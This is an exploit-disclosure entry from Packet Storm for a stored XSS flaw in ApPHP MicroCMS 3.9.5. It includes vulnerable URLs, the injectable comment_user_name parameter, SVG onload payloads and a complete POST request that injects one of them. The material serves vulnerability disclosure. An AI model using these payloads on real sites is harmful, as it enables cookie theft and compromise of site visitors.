ApPHP MicroCMS version 3.9.5 suffers from a persistent cross site scripting vulnerability.
d1a235d5a1dc75162006146885d6250531498ba9dab147982ea073d8fbe25694# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 12/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : https://www.apphp.com
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products
-*-*-*-*-*-*-*-*- Description -*-*-*-*-*-*-*-*-
*-* Vulnerable link : https://site_name/path/index.php?page=pages&pid=
*-* Stored XSS Payload ( Comments ):
# Vulnerable URL : https://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
# Payload : <svg/onload=prompt(7);//>
############ POST DATA ############
task=publish_comment &
comment_id=
& article_id=13
&user_id=
&token=212529c97855409e56c0e333721461df
&comment_user_name=<svg/onload=prompt(document.cookie);//>
&comment_user_email=meryem@yopmai.com
&comment_text=skdLSJDLKSDKJ
&captcha_code=w7AG
&btnSubmitPC=Publish your comment
############ ########## ############
*-* Thanks Meryem AKDOAAN *-*
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed